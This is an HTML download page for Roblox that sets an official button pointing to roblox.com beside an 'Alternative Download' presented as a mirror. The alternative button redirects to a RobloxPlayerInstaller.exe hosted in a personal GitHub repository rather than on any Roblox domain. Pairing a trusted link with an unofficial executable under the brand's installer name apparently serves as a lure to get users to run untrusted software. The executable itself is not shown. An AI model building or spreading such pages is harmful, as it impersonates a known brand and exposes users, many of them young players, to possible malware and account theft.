﻿<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Roblox Download Options</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #f0f0f0;
            margin: 0;
            padding: 20px;
            display: flex;
            justify-content: center;
            min-height: 100vh;
        }

        .container {
            display: flex;
            gap: 20px;
            flex-wrap: wrap;
            justify-content: center;
        }

        .download-box {
            background-color: #ffffff;
            border-radius: 10px;
            padding: 30px;
            width: 300px;
            text-align: center;
            box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1);
            transition: transform 0.2s;
        }

        .download-box:hover {
            transform: translateY(-5px);
        }

        .official {
            border: 2px solid #00a2ff;
        }

        .alternative {
            border: 2px solid #ff6600;
        }

        .download-button {
            background-color: #00a2ff;
            color: white;
            border: none;
            padding: 12px 30px;
            border-radius: 5px;
            cursor: pointer;
            font-size: 16px;
            margin-top: 15px;
            transition: background-color 0.3s;
        }

        .alt-download-button {
            background-color: #ff6600;
        }

        .download-button:hover {
            background-color: #0087d4;
        }

        .alt-download-button:hover {
            background-color: #e65c00;
        }

        h2 {
            color: #333;
            margin-bottom: 15px;
        }

        p {
            color: #666;
            line-height: 1.6;
        }

        @media (max-width: 768px) {
            .container {
                flex-direction: column;
            }
        }
    </style>
</head>
<body>
    <div class="container">
        <!-- Official Download -->
        <div class="download-box official">
            <h2>Official Roblox Download</h2>
            <p>Safe and secure download directly from Roblox Corporation</p>
            <button class="download-button" onclick="downloadOfficial()">Download Now</button>
        </div>

        <!-- Alternative Download -->
        <div class="download-box alternative">
            <h2>Alternative Download</h2>
            <p>Mirror download link (version 2.5.6.3)</p>
            <button class="download-button alt-download-button" onclick="downloadAlternative()">Alternative Download</button>
        </div>
    </div>

    <script>
        function downloadOfficial() {
            // Replace with actual official download link
            window.location.href = 'https://www.roblox.com/download';
            alert('Starting official Roblox download...');
        }

        function downloadAlternative() {
            // Replace with actual alternative download link
            window.location.href = 'https://github.com/MeZavy/robloxdown/raw/refs/heads/main/RobloxPlayerInstaller.exe';
            alert('Starting alternative Roblox download...');
        }
    </script>
</body>
</html>